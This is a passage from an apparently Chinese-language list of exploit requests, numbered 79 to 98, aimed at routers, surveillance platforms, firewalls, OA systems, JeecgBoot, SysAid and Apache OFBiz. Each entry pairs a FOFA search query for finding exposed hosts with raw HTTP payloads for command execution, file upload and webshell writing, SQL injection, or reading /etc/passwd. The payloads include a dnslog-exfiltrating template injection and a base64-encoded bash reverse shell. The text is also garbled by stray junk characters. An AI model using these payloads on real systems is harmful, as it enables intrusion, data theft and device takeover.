/ r/ C/ j5 D% J( XContent-Type: image/png
9 y5 ^7 ]: L2 A6 Y4 i# ?
# k" n* C p. u% n: Y7 B* NYsOxWxSvj1KyZow1PTsh98fdu6l
. w; `0 t/ m8 M: e+ R------YsOxWxSvj1KyZow1PTsh98fdu6l3 ?8 u* K2 ~. p* \6 M
Content-Disposition: form-data; name="target"5 G4 S* L# [# R W& V
1 S7 W" e3 J9 Y/ q' M. L) d9 i/Applications/SkillDevelopAndEHS/
% c7 v" R* r/ G* _1 i) X# L3 s; F& h------YsOxWxSvj1KyZow1PTsh98fdu6l--
, l) q0 Y) P% q) ] n/ { V# @9 s- _3 n3 B3 d& ^! Z
: w( D% E5 V" b! C
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
6 r* P1 _2 @- h Y- D0 UHost: x.x.x.x
1 W, K' f0 _% I$ G$ y8 p$ ?6 L- c1 ^- O
7 Y0 m9 I6 P3 \# u7 ^
79. BYTEVALUE 百为流控路由器远程命令执行/ e% r! z2 A& L- ]2 J/ d
FOFA:BYTEVALUE 智能流控路由器# [ E2 z7 | i$ J! S M- P4 w, d' A
GET /goform/webRead/open/?path=|id HTTP/1.13 ~! g/ I6 y! v+ ~$ ^' ~* Y
Host:IP
6 r9 N$ ?( H/ K; u7 _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
8 Y! `. W {" c+ j) F/ g( SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ a* R/ N7 p2 ?( mAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ b4 t% l" t' J: f* m8 A" A, K) bAccept-Encoding: gzip, deflate
2 i/ Z0 u3 u; q8 D- uConnection: close
# h/ e9 n% z( p9 R- aUpgrade-Insecure-Requests: 1
], I2 {6 O8 e b% M, H) d
' j+ u K w( W% D6 x) T2 R# ]3 `" K. `& a# k# ?
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传& ~1 g6 L) A8 W' f$ k! F" \
FOFA:app="速达软件-公司产品"
7 g; z$ I# F2 e4 o( }POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
4 V& |! d& E; M5 I6 CHost: x.x.x.x
0 o! N/ D7 q% }$ t# D- x% ^User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ d0 R# ]! ^5 ?2 V9 W
Content-Length: 274 g; |7 q* t, R7 ^% h( b: s
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
! B4 V4 R/ b+ r C$ G8 G3 kAccept-Encoding: gzip, deflate2 ^5 e9 I' Z; N+ h* p
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 I7 p; f% R7 ^+ L% C MConnection: close
0 z/ a1 M0 E; Z) A3 R) n# r( i- rContent-Type: application/octet-stream& s+ ]' b5 w9 s6 |" N7 x
Upgrade-Insecure-Requests: 15 M0 E" ~7 _/ l! K/ }
' @, K" N) U; {! F( u5 ]; c) Q& t! Y& f<% out.print("oessqeonylzaf");%>
$ z4 Z& I. Y l* l$ V8 n! T' F/ I8 V; x# X7 j" u) ]% }- b1 I
* s \; j: W/ h7 _GET /xykqmfxpoas.jsp HTTP/1.1
! l8 p. ?6 b$ B0 P0 AHost: x.x.x.x, l+ u5 U- B g7 x6 l
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 U/ a% j5 L8 x! [8 {9 g i
Connection: close
B0 {+ T1 C) j8 O+ A& b- y) }- aAccept-Encoding: gzip; R; y- w2 T# [/ M; t8 ^: b
8 e4 Y7 ~" ?0 k* K t- X
4 u( p- v1 M4 E M3 _) a+ a- N81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
0 O0 t( T$ ]7 |/ W* ~" o# p- H7 HFOFA:app="uniview-视频监控"
$ z$ I t: S7 W; s* u5 FGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
# ~: Z% {- s( l) O3 W2 k% P5 ?: |Host: x.x.x.x+ c1 d+ \7 ~$ g/ j- H& G
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
0 g& U; C" y1 F1 X; a! W3 mConnection: close
& ]& [) I) N eAccept-Encoding: gzip
" ], @% J" o e# ~4 l5 [
u b2 b2 t& n) ?* ^. ~1 w/ [9 w( R7 w
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
$ D5 ]9 [2 r0 f3 q+ o Q' Q& a9 VFOFA:app="思福迪-LOGBASE"; d! K2 e; O% y2 E; S) z
POST /bhost/test_qrcode_b HTTP/1.19 J1 m: j3 X- j3 [. v0 r. h
Host: BaseURL
3 d7 m7 d, I, EUser-Agent: Go-http-client/1.1
3 H% M9 R4 h' H% e3 m$ X" HContent-Length: 23
4 {. n% L% o7 S- IAccept-Encoding: gzip
4 N A- `8 d6 t8 CConnection: close
. h9 R$ k5 w6 ~4 D" GContent-Type: application/x-www-form-urlencoded2 C. Y4 N1 f, i& }
Referer: BaseURL" P$ `# l* h6 O* B5 O& ~ b
+ Q7 ?& \0 M6 ^- [5 ]2 ^z1=1&z2="|id;"&z3=bhost
: p' C- o8 a! Y& b# r& M) S# e, h* O8 F( U' y
- B; F5 K- L' P3 a
83. JeecgBoot testConnection 远程命令执行
J& g* b* G: jFOFA:title=="JeecgBoot 企业级低代码平台"
. M. B' s, x! ~1 T5 ]0 @4 L+ T7 z# x+ p5 j$ I# j
2 @) g- j- j! L* M! v8 A
POST /jmreport/testConnection HTTP/1.1
6 E! E2 ~* c, Y: C, ], s& GHost: x.x.x.x4 D7 n9 E+ C0 @- J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 l6 }% ]5 F% ]. M& Y6 Y4 p5 {
Connection: close+ X" d" A/ a h' ~
Content-Length: 8881
9 z. h7 P- E4 oAccept-Encoding: gzip5 `& y, n* k; T8 h7 r" C
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
2 y% M0 W8 \ U! K4 A+ l, AContent-Type: application/json
N" Q$ f ?! {& G% i) ?+ S+ y+ Y* t% g/ T5 B
PAYLOAD
- P5 h2 w$ j( J5 z0 K9 z5 |7 |1 Y/ c* `4 q! |+ W2 Y
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入9 ~" Y; q* ^- }+ M( h) w- B- \
FOFA:title=="JeecgBoot 企业级低代码平台"6 L0 j0 z7 `7 i/ {6 N
$ O* J Y5 l! z
5 D W$ [0 q6 [, o7 @/ ^- k. f G2 l# x0 [, X% x
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
* s( W" _8 X+ T2 X, T1 y: @Host: 192.168.40.130:8080- L% Y7 C' F: S
User-Agent: curl/7.88.1
) Z2 f$ d4 C" F: |2 l; ~Content-Length: 156/ {+ R0 I0 @3 F+ D2 _
Accept: */*) h. t' }; F! L8 K9 _& @
Connection: close
: K' R0 E+ u0 P6 e* K+ HContent-Type: application/json
4 W5 L/ w! M% KAccept-Encoding: gzip
3 U% g3 T/ s3 `
* z2 ~8 i6 |) A ~{
1 F) p; L; C% o5 W( Y9 Q, y6 T5 } "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",$ z2 o$ M% ~7 l$ ^: \9 a
"type": "0"' A$ l+ o* e; G3 [8 z: ^
}+ l6 r# y. y7 G( i- M8 {0 {
( y: k: G7 G- r. o2 ?- B
7 R& X8 O; @* x0 j) c85. SysAid On-premise< 23.3.36远程代码执行
1 G1 e7 u/ M* D& aCVE-2023-47246
7 q0 {/ u; l2 b( E* A& i gFOFA:body="sysaid-logo-dark-green.png"
- Z2 f! F; t( b: Y: JEXP数据包如下,注入哥斯拉马# q8 q2 @8 u8 ]# b
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
! _: E/ p8 y- s6 }Host: x.x.x.x5 Q+ E7 @* ~" g3 H3 Q5 @/ W) Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+ A7 F$ }: A* C7 j0 h4 MContent-Type: application/octet-stream
' g0 L9 m6 c) w( S; W6 xAccept-Encoding: gzip* X4 v6 F6 M4 Y; f
( R9 L9 S9 r& x3 c
PAYLOAD `2 D* O4 Y1 C( X# p' _; x
7 G* b+ H3 C9 f0 ?* h- G2 b5 ]* |8 j
回显URL:http://x.x.x.x/userfiles/index.jsp
" a- w! L. ?$ ]' S. D7 M3 K# G- ]! _* D6 s# _" ^6 I
86. 日本tosei自助洗衣机RCE( y5 u% y9 q' M( l
FOFA:body="tosei_login_check.php"
; t8 G9 A2 j# {POST /cgi-bin/network_test.php HTTP/1.1
/ p/ l- e- G+ Z( i* lHost: x.x.x.x
. g( m2 a# y* oUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
! v* {. `! K; a* n9 Y% zConnection: close: J& B9 L8 C9 C1 x* Z S
Content-Length: 44
! @2 w7 R0 b( c. f4 S; {Accept: */** r% n+ F/ O5 X2 N, j- X: ~
Accept-Encoding: gzip
. L, _. ]6 ~5 j3 wAccept-Language: en
* Q) \& ]8 R- ?# xContent-Type: application/x-www-form-urlencoded
6 ^% e6 y" v" ?, D; t8 [; \$ D Y Y8 t8 g( D" j
host=%0acat${IFS}/etc/passwd%0a&command=ping4 ?9 g( V2 @; c/ e
8 o j+ N' ?" q9 h9 }
/ `3 }4 Z1 y' i87. 安恒明御安全网关aaa_local_web_preview文件上传
- v: z( a4 d+ c2 v" u/ M, F4 QFOFA:title="明御安全网关"- `# T9 c. K( R3 g& e* j+ ]' H
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.14 R$ _: x" Z8 M6 g6 [4 v
Host: X.X.X.X
, r1 B/ s( }) j$ h V2 HUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
8 L0 R/ d* L* k# ~% N7 e5 p4 I, Q& NConnection: close5 q$ i8 G6 t* e6 d1 s/ y
Content-Length: 198' w; r$ t& \8 B+ H j$ @% K y) g
Accept-Encoding: gzip$ }4 u; Y/ C' G i4 M' Z( n: n
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
3 X. c% B6 I& O- ]; B# ?* A' L
+ @4 G: g Z1 ~--qqobiandqgawlxodfiisporjwravxtvd1 |& B7 ]- H8 l" c" c
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
. j$ g! O" X4 Q9 ~3 p; l- Y5 V) bContent-Type: text/plain
; i; Z3 _: J0 g- I% q$ e6 O2 U6 r# D. q! n+ C# @! r# D
2ZqGNnsjzzU2GBBPyd8AIA7QlDq/ f. p; L" M# R# E- D
--qqobiandqgawlxodfiisporjwravxtvd--
, M% o! V& r/ I4 W9 K
4 @/ X* X5 R: S+ `$ N; v) u8 o& a% G
/jfhatuwe.php, a0 Y0 J$ R E6 g' X
5 g/ K. V. d6 A' L8 i5 n
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行3 V6 k/ U" f2 M9 S1 }" R. N) H
FOFA:title="明御安全网关"
c+ y+ ]. n2 O3 x% VGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1& o0 k0 Y( @ W2 ?, O8 J- u: }
Host: x.x.x.xx.x.x.x
2 g' Q+ U& }. D BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 q4 T7 R% t+ i+ ~& gAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( J- q' M T0 g2 W) p
Accept-Encoding: gzip, deflate3 ]9 f4 z8 r; J& n! ?" m+ j
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- N2 C7 Y' M/ P* YConnection: close
# v; v9 w0 G t+ l, _8 u5 @0 N& n% h" G6 s5 X% t3 e1 k
2 }2 V& q. b$ i- i" B' g/astdfkhl.php
" ?( i$ N# }7 v6 U: A+ z
; t/ @. m4 P3 K: ?. g2 N1 a- n) O89. 致远互联FE协作办公平台editflow_manager存在sql注入8 P: N- M! _; T0 m8 w0 U, b4 H. `
FOFA:title="FE协作办公平台" || body="li_plugins_download"
L0 I5 [0 y8 f, z0 a" t+ CPOST /sysform/003/editflow_manager.js%70 HTTP/1.15 ^4 U3 M) s s4 ^6 {
Host: x.x.x.x
/ d: d& U- G' C' {- `& wUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.152 a: A0 O1 b; Q: H1 d- o" ?
Connection: close
v% y; @4 E& ?; A0 c! SContent-Length: 41; w" t8 T; _% W3 E8 |. o
Content-Type: application/x-www-form-urlencoded
0 M) O. D E0 l) {) g9 ?. m0 PAccept-Encoding: gzip: u$ q T6 r- U( C8 ^
& | |! T. X- }; b3 i4 _& n
option=2&GUID=-1'+union+select+111*222--+
- a6 Z6 u/ G6 R% _$ S, A. ?
5 z8 d$ }8 @0 `; |/ g& j. b5 r: y! B
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行+ K8 Z. h M7 O
FOFA:icon_hash="-1830859634"
# M; S& i. e- \* a+ ~POST /php/ping.php HTTP/1.1! v8 b/ e3 {% l3 Z) @( |) _9 b
Host: x.x.x.x
0 X, [* z* K7 q/ N' R0 X2 [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
- T- p" l" u/ [/ E* VContent-Length: 513 \* n; Q( h3 C6 m5 V
Accept: application/json, text/javascript, */*; q=0.01
2 e2 d+ b5 R# l! F% bAccept-Encoding: gzip, deflate
! o' n( q+ [$ v, Q8 d0 FAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ g% q7 N$ T2 \4 h5 I
Connection: close z& ~0 e: c8 [& m
Content-Type: application/x-www-form-urlencoded
$ q" a$ ?; [; D# u7 k; C$ eX-Requested-With: XMLHttpRequest
6 C4 [" {. S* O0 s6 n
& W8 q% \2 h6 ^5 b3 Z9 E# Hjsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
, \) @: @0 `9 ~' M5 I0 @# l& x+ e! [) _5 _8 w: C
" G% n' h' F! g5 g! {91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
& Q* L. D1 I- J' C' ~FOFA:title="综合安防管理平台"9 I" p2 }5 [) R
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
2 ]3 P9 A) `0 x6 ~+ _9 ~3 EHost: your-ip8 C8 i9 a% l7 A6 b1 V9 u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
" n9 b8 N! c9 N% `$ j+ I# M |; pAccept-Encoding: gzip, deflate+ t$ X) d) i! N, a+ l# c; _
Accept: */*
* q& b9 L& k1 fConnection: keep-alive& b2 }+ W. ]3 l1 Q: ], K& r
+ j9 F0 w/ Q" S- Z4 b/ | l/ k
2 P! L7 G8 D4 ?/ r
3 m; R+ C4 ~8 f! n* e0 @) n92. 海康威视运行管理中心session命令执行5 i1 k& S6 y9 G
Fastjson命令执行
( f6 E! l6 W- J1 y/ ~( r7 nhunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
( N' G1 [) o9 `6 f: cPOST /center/api/session HTTP/1.1
0 U+ b4 F" M$ {/ \. @, sHost:- h' \3 |- H+ S3 O8 M/ X- t0 P
Accept: application/json, text/plain, */*; v- {# P, @) B/ L: X
Accept-Encoding: gzip, deflate# t8 ^% c0 G e7 z2 I
X-Requested-With: XMLHttpRequest; M3 D! T4 k! d( Z8 n4 C: E7 J1 O+ e
Content-Type: application/json;charset=UTF-8
9 i3 C O k4 }; G/ b& W# KX-Language-Type: zh_CN
: T; Q \; O- TTestcmd: echo test
+ X% l7 e, x) q! t3 N7 { j* mUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 u6 d" r2 [0 j$ K
Accept-Language: zh-CN,zh;q=0.92 n! E! ]: h" \0 K5 G5 T
Content-Length: 5778
5 F1 a+ O) Z! E% ^9 j0 A% h# I- Q% x+ ^4 o- U
PAYLOAD: D$ W0 @9 H! m( H4 l# [' i2 a
! j; L0 Z# Q6 [$ u- g5 ~
4 `( d1 Q; a3 x' W93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
) k+ j$ y- P, w9 \$ T; LFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
0 L3 Y8 D5 d# m: _% |POST /?g=app_av_import_save HTTP/1.1/ t: B9 a: _- U2 T
Host: x.x.x.x9 `! y6 U, q5 V) c
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
, I+ t# a8 @1 `+ P9 J9 F, _User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
6 d& x. M- r. A2 Q. f" \8 g, g+ K* n3 `& G5 {( c. @1 b4 o
------WebKitFormBoundarykcbkgdfx
9 G+ p# F/ W" d; OContent-Disposition: form-data; name="MAX_FILE_SIZE"
, |5 Z7 s0 r+ n5 v: U0 @1 R+ Y/ @/ X% L& E
100000002 i, G- T2 Q7 Y6 ?
------WebKitFormBoundarykcbkgdfx+ h" b; V. K" X2 \
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
. ?, W/ [8 e: ZContent-Type: text/plain2 N' x' S+ i9 q. C; T) v) g5 I! ~9 |
2 H5 o3 F& ~9 c6 I, wwagletqrkwrddkthtulxsqrphulnknxa
+ J" D K8 W/ X$ k6 ]------WebKitFormBoundarykcbkgdfx
# c8 r# a. l. ^' u1 a, {9 M4 TContent-Disposition: form-data; name="submit_post": l$ F! I: l4 e) h3 p8 p {( @2 e
1 B( O9 X ~' L, r9 v( ~
obj_app_upfile
* X3 Y8 \. d# q2 W8 G, a7 p% d------WebKitFormBoundarykcbkgdfx! i1 U- k( w8 W) d2 {: D6 B; C1 P! T
Content-Disposition: form-data; name="__hash__"
4 m# J$ t( r( [7 I2 `0 C/ f2 A: {* g" M
0b9d6b1ab7479ab69d9f71b05e0e94457 |% }6 F5 a4 X7 `' ]0 E
------WebKitFormBoundarykcbkgdfx-- c2 f& d5 B7 s( z" y3 D( s* _4 e
/ s6 [: e! M3 u8 C1 _& y$ h9 ?% i! O/ Z3 A3 @
GET /attachements/xlskxknxa.txt HTTP/1.1$ Z( c3 k6 ~- q3 c9 O
Host: xx.xx.xx.xx! _2 M# c# m+ i* Z
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36& c, t$ U; K( }5 P, w
! l/ m; j W- I' c% K }& t% U" {5 j! C
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
" n( C3 R! f, M- M: j& IFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="6 e4 E2 K; a1 {
POST /?g=obj_area_import_save HTTP/1.1
b+ r ~3 T' }7 ~Host: x.x.x.x
2 Z' ~ m$ f$ q1 V; O% H2 x* IContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
0 E. |) _, i* d- WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
- \% [" h- T0 z1 E, @
7 u7 m6 Y1 w) C, `- C------WebKitFormBoundarybqvzqvmt2 V# j3 O# ^1 U" i' }% a. s
Content-Disposition: form-data; name="MAX_FILE_SIZE". k) K* _: Q5 a3 J: K: L+ ?
2 y% P0 @! ~, S! [* q6 ?5 }( L4 I, d
10000000& q, z0 U- r6 {( [
------WebKitFormBoundarybqvzqvmt
/ [: h2 P; u* X5 f# C f: O! {Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
) d/ |- ?7 l& Y: m7 l OContent-Type: text/plain! j) o/ M) W, |2 c+ r0 b5 m
' \. u% x0 W; l, X: hpxplitttsrjnyoafavcajwkvhxindhmu0 n9 B9 X% g/ Z/ z; V$ i
------WebKitFormBoundarybqvzqvmt
7 X# o! R( l3 l+ r mContent-Disposition: form-data; name="submit_post"9 z& z% F2 [5 ^* L* a9 [1 J% h& E
. `" Q8 W. |0 r
obj_app_upfile8 q4 E, R$ O4 L7 Q W |; A
------WebKitFormBoundarybqvzqvmt
' \3 q! e9 y8 _" A; r& eContent-Disposition: form-data; name="__hash__"2 b4 D1 n4 g; R7 `( y
$ b% y7 n; ]9 d5 j* A8 D
0b9d6b1ab7479ab69d9f71b05e0e9445
! ^7 D# @4 X- H( T; f------WebKitFormBoundarybqvzqvmt--
/ q7 l: I$ w" _$ J2 Z+ i5 V$ s1 i; Q, v D% F8 q4 Q& E3 ~2 `& e
; b9 h) l4 }" X2 P1 m: x8 O
5 n% ~ T3 ^: Q. \) |GET /attachements/xlskxknxa.txt HTTP/1.1 q# c- b; I }* U7 M
Host: xx.xx.xx.xx
& G( F; i! O! nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
, K- _; y9 L- j* @/ d) ^6 D! k/ |2 `
! J/ B1 N# R- O6 M/ j1 O3 b l$ H; o$ j, L# A# x: k2 X: s
) X/ D- K: Z' @95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行( W. C% U/ R3 J
CVE-2023-49070
5 v6 n: _6 z- C. }FOFA:app="Apache_OFBiz"
4 U; ?9 E% U8 c# \) APOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1: b& i9 X5 W3 p- ]+ V! K9 |
Host: x.x.x.x# y0 \+ m K- w/ r. A ]8 z5 G- {; x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
6 T$ N1 C$ s" F9 VConnection: close
4 V9 O5 H1 C. Y1 { O C. ~Content-Length: 889. O* I( l& n' s; b& l. z
Content-Type: application/xml$ ^( a' j7 ^3 o( `$ q( K8 O
Accept-Encoding: gzip+ ] ?0 h, J3 o% h0 H% s
/ G( o& C6 g+ O+ o( z- R<?xml version="1.0"?>" {9 l/ F( ]; r5 h* ^
<methodCall>
6 m# _% {* P$ I. U* q3 ~ <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>; @% z+ |% z0 z" I; Q
<params>
; n* x! Q/ G' p$ b, N; }3 f <param>4 L7 T# w! Y: D, \3 K0 r! p3 u* }
<value>7 P( ~! I) m! r- G* h' Y
<struct>
# L7 \# L0 o% ? <member>
' U! `* f* c4 ?. H# g* M! Z6 y <name>test</name>6 J7 f% g: n( e1 z8 l2 ~1 s' M
<value>6 J* ~8 s9 i/ z& U/ ?4 U' }8 f" k
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>4 Q$ U+ E- F7 U
</value>
; y0 W/ V& [' E. M </member>
% T; w; N* J7 Z, A3 F0 V: E </struct>( F8 e. z2 e6 h
</value>0 ~1 K/ @+ Z0 |: [1 s5 S
</param>, [1 p* A+ [3 V4 Z& R* l: b
</params>1 x& l4 R. }) U/ Q: R8 l
</methodCall>
' Z* m; M1 o ~5 S" G) ^; g2 f4 U- M; _2 @. r- H5 E6 C: I p y! u
1 [4 V3 M7 k) }2 d6 {* A' l用ysoserial生成payload
& u* Q9 K9 Q: A: s: k: njava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
3 x6 ]2 u6 V. C% l/ n+ f2 R
; ^: U8 W8 v% B+ o3 i- G. j2 ]1 c/ c
将生成的payload替换到上面的POC
, G& W+ S9 H! q6 o) }4 H6 N3 Y7 ZPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.16 O9 K+ @' ]: S. E
Host: 192.168.40.130:8443+ b9 a) p! i; C4 p7 ?0 {
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.365 h. E1 s/ r& Q% n- X! c7 @
Connection: close
7 T Z% a0 r% S7 |% NContent-Length: 8899 Q. M3 N, A: Y: `
Content-Type: application/xml
' X8 s9 h: d- B( @2 iAccept-Encoding: gzip
' U/ O- \/ ]7 k/ T4 S m$ e# p& z. _9 S' {) G( {0 T/ P" K
PAYLOAD
6 a3 I2 C. Z2 G- A+ b. ^
9 E7 C2 u! X) r& Y1 @( O+ p96. Apache OFBiz 18.12.11 groovy 远程代码执行
1 }! A) o* j; p0 iFOFA:app="Apache_OFBiz"1 {% u B7 {* D& Q. R+ W* }
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
4 w% }& s3 L: R1 Q) UHost: localhost:84430 A3 n. K+ x* U; i+ I! Q5 }8 g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0& T3 c. N. T8 p9 S! v7 ~, ?2 u
Accept: */*
$ b r% A' m. a9 }1 n3 WAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! y, Q- y+ b q
Content-Type: application/x-www-form-urlencoded
6 L" [3 p n l$ Z. C4 I& Z* x5 GContent-Length: 555 `# \- z" R/ \7 R
3 z( h m, K& j2 j# L3 [groovyProgram=throw+new+Exception('id'.execute().text);0 s7 L9 p/ t1 w* J) q
8 K- s4 m( }" f3 M; b. X( P0 f4 ]& l! ~) Z: j- u6 N
反弹shell& C; f7 V1 P; L5 C* n/ V
在kali上启动一个监听 x" b- B9 T, i! i6 W
nc -lvp 7777
( N( {2 B/ a1 O' m% I; @7 _% L! D( c; W- e! S2 l: N
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1" z i0 A& }* C7 K
Host: 192.168.40.130:8443
# s# Y0 e- P( h( D4 XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0$ T4 i* [) I; p3 s; y2 c
Accept: */*
4 A# _. R3 y# ~ \. i1 l: GAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 C: o' q& o/ XContent-Type: application/x-www-form-urlencoded& B) C/ F9 C$ L2 [, j# k6 D3 U
Content-Length: 71' S7 Q; p8 H4 N7 n2 y0 u7 j
1 |1 E; D% r: A9 C% @! k
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();5 X; G& p& l" {4 @: @. C) \
' j, w' d" l* S8 A0 ^97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行& r& \* s( j6 S7 T- F- @" q$ v' T
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
6 @' T. Y6 @4 o2 j# j* |$ sGET /passport/login/ HTTP/1.1
! X( q# t" @& E7 a# WHost: 192.168.40.130:8085
% _9 d' [* q! g! g. I) {4 rUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( d) p: p1 C) V5 Z% |+ ^4 n3 |& p
Accept-Encoding: gzip
$ c( q2 r' h. ^6 BConnection: close% ?# I" _0 U9 w& O: A2 o
Cookie: rememberMe=PAYLOAD
% M6 v+ S3 I$ ^( `& i+ LX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"4 i# t0 ^( B) t6 S/ J
2 g$ R; a, i2 y- }
& W8 t3 D. d" T2 M& R
98. SpiderFlow爬虫平台远程命令执行 {' ~4 A2 h; x6 Y& ~# x+ r
